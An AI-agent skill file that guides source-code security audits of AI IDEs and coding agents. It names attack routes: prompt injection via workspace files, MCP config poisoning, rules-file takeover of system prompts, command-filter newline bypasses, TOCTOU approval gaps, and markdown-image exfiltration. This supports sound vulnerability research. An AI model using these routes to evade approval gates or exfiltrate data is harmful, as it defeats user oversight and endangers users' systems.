AI IDE Source Code Audit
This skill provides AI-IDE-specific guidance for source code security auditing. It directs your attention to the code areas most likely to contain vulnerabilities based on the vulnerability taxonomy -- instead of reading the entire codebase, you focus on six priority targets ordered by the interaction tier most likely to yield findings. Tier 1 (zero-interaction) bugs are the highest severity and hardest to dismiss; start there and work down.
This skill is for open-source targets only. For closed-source targets, use ai-ide-recon (documentation analysis and black-box enumeration).
When to Use
- When you have source code access to an AI IDE or coding agent (Cline, Continue, Roo Code, parts of Cursor, Gemini CLI, Codex CLI, etc.).
- After ai-ide-recon has classified the target as open-source or hybrid and identified which features to investigate.
- When you want to understand HOW a security control works -- not just whether it exists (recon), but whether it is correctly implemented (audit).
Preconditions
- Source code access is required. You must have a local checkout of the target's source code. If the target is closed-source, stop here and use ai-ide-recon instead.
- Recon must have been completed. Run ai-ide-recon first to identify the target's feature set, classify it as open-source or hybrid, and determine which audit targets are relevant. Recon output tells you which of the six targets below actually exist in the product so you can skip the rest.
Without both preconditions met, the audit targets below will produce incomplete or misleading results.
Interaction Tiers (Quick Reference)
Every audit finding maps to one of four interaction tiers. The tier determines how reportable the finding is and how vendors will respond.
| Tier | Trigger | Reportability |
|---|
| Tier 1 -- Zero-Interaction | Victim clones repo and opens it. No trust granted, no message sent. | Highest -- vendors cannot argue "user chose to trust." |
| Tier 2 -- Agent-Mediated | User sends a message or interacts normally. PI in workspace files drives agent action. No explicit approval of the malicious action. | Strong -- no conscious approval of the specific attack. |
| Tier 3 -- Requires Approval Click | User must click "Trust," "Allow," or approve a specific action. | Weak unless approval is misleading or UI is confusing. |
| Tier 4 -- TOCTOU / Post-Trust | User already trusted project; config is modified after approval (e.g., via git pull). | Weak standalone. Interesting only with TOCTOU, scope escape, or routine-action triggers. |
Code-Level Tier Indicators
When reading source code, use these patterns to classify what you find:
- Missing approval gate = Tier 1. Config loads, commands execute, or servers spawn without any trust check. The code path from untrusted workspace artifact to high-impact action has no gate at all.
- Approval gate present but no re-prompt on modification = Tier 4 TOCTOU. User approved once; subsequent loads of the same artifact skip re-approval even if content changed. Look for approval keyed by path/name rather than content hash.
- Approval gate with re-prompt on modification = Working defense. The gate fires on first load AND re-fires when content changes. This is the correct implementation -- not a vulnerability at the code level.
Integration with audit-context-building
If you have access to the Trail of Bits audit-context-building skill, use it before this skill to build architectural context. Apply it with AI-IDE-specific focus:
Phase 1 (Orientation): Prioritize these entrypoints:
- Config auto-loader (where workspace config files are read and applied on open)
- Command execution handler (where terminal commands are constructed, filtered, and dispatched)
- MCP config loader (where MCP server definitions are read from files and registered)
- File-write permission checker (where file write requests are approved or denied)
- Prompt/rules file loader (where instruction files are read and applied to the agent context)
- Output renderer (where AI output is rendered to the user, including markdown, images, and webviews)
Phase 2 (Ultra-granular): Apply 5 Whys specifically to:
- Trust boundary decisions (Why is this input trusted? Why is workspace content treated as safe?)
- Permission checks (Why is this action allowed without approval? What conditions skip the approval dialog?)
- Config loading (Why is this config auto-loaded? Why is there no re-approval on modification?)
Without audit-context-building: Follow the same priority order manually. Start with the entrypoints listed below and trace call chains from each.
Priority Audit Targets
Ordered by interaction tier yield -- targets most likely to produce Tier 1 (zero-interaction) findings are first. Start at #1 and work down.
1. Config Auto-Loading [Tier 1]
What to find: The code path from "workspace is opened" to "config files are read and applied."
What to look for:
- Which files are read on workspace open? In what order?
- Are workspace config files merged with user config? What wins on conflict?
- Can workspace config override security-relevant settings?
- Is there a trust check before applying workspace config?
Vulnerability indicators:
- Workspace config overrides user config for security-relevant settings
- No workspace trust gate before applying config
- Config files read and applied synchronously on open (no approval opportunity)
Tier classification at code level:
- No approval gate before config is applied --> Tier 1 (zero-click config load)
- Approval gate on first open but no re-check on modification --> Tier 4 TOCTOU
- Approval gate with hash-based re-prompt --> Working defense
2. Command Execution Pipeline [Tier 1]
What to find: The code path from "user or LLM requests a terminal command" to "command is executed in a shell."
What to look for:
- How is the command string constructed? String concatenation? Template literals? Argument arrays?
- Where is the filter applied? Before or after shell metacharacter expansion?
- What does the filter check? Full command string? First token? Parsed AST?
- Is the shell invoked via
exec (string to shell) or execFile (argument array, no shell)?
- Are environment variable prefixes stripped or passed through?
Vulnerability indicators:
child_process.exec(command) with user-influenced command --> shell injection
command.startsWith(allowed) --> newline bypass
- Regex-based filter without multiline mode --> newline bypass
- Allowlist that checks command name but not flags --> dangerous flag abuse
- Filter applied to a different representation than what the shell sees --> parsing differential
Tier classification at code level:
- No filter at all, or filter applied only to first token --> Tier 1 if commands can auto-execute (hooks, tools auto-load)
- Filter present but bypassable via PI-driven command construction --> Tier 2
- Filter present, bypass requires user to approve the exact command --> Tier 3 (weak unless display differs from execution)
Reference: references/audit-focus-areas.md for specific function names and code patterns.
3. MCP Integration Layer [Tier 1/2]
What to find: The code path from "MCP config file exists in workspace" to "MCP server process is spawned."
What to look for:
- How does the IDE discover MCP config files? Which paths does it check?
- Is there an approval dialog before loading workspace MCP config?
- Does re-opening a modified config trigger re-approval?
- How are MCP servers spawned? Is the
command field passed directly to exec?
- Are tool invocations from workspace-defined servers auto-approved?
Vulnerability indicators:
- Config loaded with
JSON.parse(readFileSync(configPath)) and no approval gate
- Server spawned with
spawn(config.command, config.args) where config comes from workspace file
- No hash or signature check between approval and re-load
- Tool descriptions from workspace MCP servers flow into the LLM context (tool description injection)
Tier classification at code level:
- Auto-load with no approval --> Tier 1 (zero-click MCP server spawn)
- Approval required but PI can trigger config write then load --> Tier 2
- Approval required, re-prompts on change, shows full command --> Working defense
4. File-Write Permission Model [Tier 2]
What to find: The code path from "agent wants to write a file" to "file is written or rejected."
What to look for:
- What triggers the approval dialog? Always? Only for certain paths? Only for modifications (not creates)?
- Are there auto-approve conditions (e.g., files the agent just created, files within a certain directory)?
- Can the approval be bypassed by writing to a different path then renaming?
- Is the approval check in the same process that does the write (TOCTOU risk)?
Vulnerability indicators:
- Auto-approve for files in
.vscode/, .cursor/, or other config directories
- No approval for new file creation (only for modifications)
- Approval check and file write in separate async operations (TOCTOU)
- Relative path resolution that can escape the workspace
Tier classification at code level:
- Auto-approve for config directories --> Tier 2 (PI can write malicious config without approval)
- Approval required for all writes but PI can socially-engineer the message --> Tier 3
- All writes gated with clear display of path and diff --> Working defense
Source: Cline TOCTOU Script Invocation
5. Prompt / Rules Loading [Tier 2]
What to find: The code path from "workspace contains a rules file" to "rules content is applied to the agent's system prompt."
What to look for:
- Which file paths are checked for rules/instruction files?
- Is the content sanitized or validated before injection into the system prompt?
- Can rules files override safety-critical instructions?
- Is there a trust check (approval dialog) on first load? On modification?
Vulnerability indicators:
- Raw file content concatenated into the system prompt
- No approval dialog for workspace rules files
- Rules can contain instructions that conflict with safety guidelines
- No modification detection (hash-based or diff-based) between loads
Tier classification at code level:
- Auto-loaded without approval and can override safety instructions --> Tier 2 (PI amplification via rules takeover when user sends a message)
- Loaded only after workspace trust is granted --> Tier 3/4 depending on trust model
- Loaded with approval, re-prompted on change, content-limited --> Working defense
6. Output Rendering [Tier 2/3]
What to find: The code path from "agent produces text output" to "output is displayed to the user."
What to look for:
- Is markdown rendered? If so, which renderer? Does it support images?
- Are image URLs fetched (potential exfil channel)?
- Is Mermaid rendering supported? Are URLs in Mermaid diagrams fetched?
- If webviews are used, what CSP is applied?
- Is there URL filtering or sanitization on rendered output?
Vulnerability indicators:
- Markdown rendered with images enabled and no URL filtering
<img src=...> tags in rendered output make HTTP requests
- Mermaid rendering with external URL support
- Webview created with
allowScripts: true and no CSP or permissive CSP
Tier classification at code level:
- Auto-rendered images/Mermaid with no URL filtering --> Tier 2 (PI triggers exfil on next agent response)
- Rendering requires user to open a preview pane or click --> Tier 3
- All external URLs blocked or filtered, strict CSP on webviews --> Working defense
NOT a Vulnerability
Not every code path you find is a security bug. These patterns are working-as-designed:
- Code paths reachable only after explicit user approval with full visibility into what will execute. If the user clicks "Allow" on a dialog that clearly shows the exact command, file path, or config that will be applied, and the displayed content matches what actually executes, the approval gate is working. This is not a vulnerability at the code level.
- Defense implementations that correctly gate, re-prompt, and sandbox. An approval dialog that fires on first load, re-fires when content changes (hash-based or diff-based), displays the full action to the user, and runs the action in a sandbox is a correct implementation. Do not report it as a finding.
- Prompt injection that causes the agent to suggest a malicious action, but the action requires user approval before execution, and the approval dialog clearly describes what will happen. The approval gate worked. The agent being manipulated is expected behavior under PI; the defense is that the user must consciously approve the final action.
- Hooks, scripts, or tools that fire only in a trusted workspace where the user explicitly enabled them, unless there is a TOCTOU condition (content changed after approval) or scope escape (action affects resources outside the workspace).
When in doubt, ask: "Did the user consciously approve this specific action with accurate information about what it does?" If yes, it is not a vulnerability. If the approval was absent, misleading, or stale (TOCTOU), it is.
Using Static Analysis Tools
semgrep
See references/semgrep-queries.md for rule templates. Key queries:
child_process.exec($CMD) where $CMD is influenced by workspace content
- Config file reads (
readFileSync, readFile) of known IDE config paths
- Process spawning (
spawn, exec, execFile) with config-derived arguments
- Markdown rendering with image support enabled
codeql
See references/codeql-queries.md for query templates. Key queries:
- Taint tracking from file read (config source) to process spawn (code execution sink)
- Taint tracking from workspace content to system prompt (PI risk)
- Data flow from AI output to rendered HTML (exfil risk)
Without static analysis tools
Use grep/ripgrep with patterns from references/audit-focus-areas.md:
rg -n "child_process|exec\(|spawn\(|execFile\(" --type ts --type js
rg -n "readFileSync|readFile.*mcp|readFile.*config" --type ts --type js
rg -n "allowlist|blocklist|allowedCommands|blockedCommands" --type ts --type js
Related Skills
This Plugin
- Start with ai-ide-recon to identify which features the target has and classify it as open-source.
- Audit findings feed directly into pattern-specific skills: command execution issues --> terminal-filter-bypass, MCP issues --> mcp-config-poisoning, etc.
- Combine audit findings with ai-ide-attack-chains for chain construction.
Trail of Bits Skills
- audit-context-building -- build architectural context before auditing (recommended for large codebases).
- semgrep -- automated pattern matching with the rule templates in
references/semgrep-queries.md.
- codeql -- data-flow analysis with the query templates in
references/codeql-queries.md.